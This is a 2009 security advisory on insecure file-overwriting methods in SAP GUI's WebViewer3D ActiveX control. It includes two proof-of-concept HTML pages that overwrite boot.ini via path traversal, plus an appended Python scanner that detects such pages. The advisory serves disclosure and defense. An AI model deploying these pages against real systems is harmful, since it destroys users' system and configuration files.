(edited) [DSECRG-09-044] SAP GUI 7.1 Insecure Methods

Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-044


Application:                    EnjoySAP, SAP GUI for Windows 6.4 and 7.1
Versions Affected:              Tested on 7100.2.7.1038 PL 7
Vendor URL:                     http://SAP.com
Bugs:                           insecure method, file overwriting
Exploits:                       YES
Reported:                       02.07.2009
Vendor response:                02.07.2009
Date of Public Advisory:        22 Sep
CVE-number:
Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer3D (file WebViewer3D.dll), Lib GUID: {AFBBE070-7340-11d2-AA6B-00E02924C34E}, which contains an insecure method that can overwrite any file on the system.

Details
*******

An attacker can construct an HTML page which calls one of the vulnerable functions, such as:

1) SaveToSessionFile
2) SaveViewToSessionFile

from the ActiveX component EAI WebViewer3D.



Example1:

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>


Example2:

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveViewToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>




For example, we can overwrite the boot.ini file or sapgui.ini, which contains all connections to SAP servers.
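
A defender-side check for the pattern in the two examples above, as an added example that is not part of the original advisory: it scans an HTML page (for instance at a web proxy or mail gateway) for an <object> tag bound to the advisory's CLSID and for calls to the two listed methods, and reports the target path. The function name scan, the finding fields and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Identifiers taken from the advisory: the control's CLSID and its two methods.
CLSID = "AFBBE070-7340-11D2-AA6B-00E02924C34E"
METHODS = ("SaveToSessionFile", "SaveViewToSessionFile")

class _Page(HTMLParser):
    """Collects ids of <object> tags bound to CLSID, plus inline script text."""
    def __init__(self):
        super().__init__()
        self.ids, self.script, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        cid = a.get("classid", "").upper().replace("{", "").replace("}", "")
        if tag == "object" and cid == "CLSID:" + CLSID and a.get("id"):
            self.ids.append(a["id"])
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def scan(html):
    """One finding per method call; covers <object> tags with an id only."""
    page = _Page()
    page.feed(html)
    page.close()
    script = "\n".join(page.script)
    # String assignments such as: File = "../../x", so variable arguments resolve.
    strings = dict(re.findall(r"""(\w+)\s*=\s*["']([^"']*)["']""", script))
    findings = []
    for oid in page.ids:
        pat = r"\b%s\s*\.\s*(%s)\s*\(\s*([^)]*?)\s*\)" % (re.escape(oid), "|".join(METHODS))
        for method, arg in re.findall(pat, script):
            path = arg[1:-1] if arg[:1] in ("'", '"') else strings.get(arg, arg)
            findings.append({"object": oid, "method": method, "path": path,
                             "traversal": ".." in re.split(r"[\\/]", path)})
    return findings

# Constructed sample page (not captured traffic); the file name is a placeholder.
SAMPLE = """<html><body>
<object id=ctrl classid="clsid:{afbbe070-7340-11d2-aa6b-00e02924c34e}"></object>
<script>function go() { var f = "../../../example.txt"; ctrl.SaveViewToSessionFile(f) }</script>
</body></html>"""
```

Calling scan(SAMPLE) returns a single finding for the SaveViewToSessionFile call with traversal set to True; a page that never loads the control returns an empty list.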


Fix Information
***************



About
*****

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:        research [at] dsecrg [dot] com
                http://www.dsecrg.com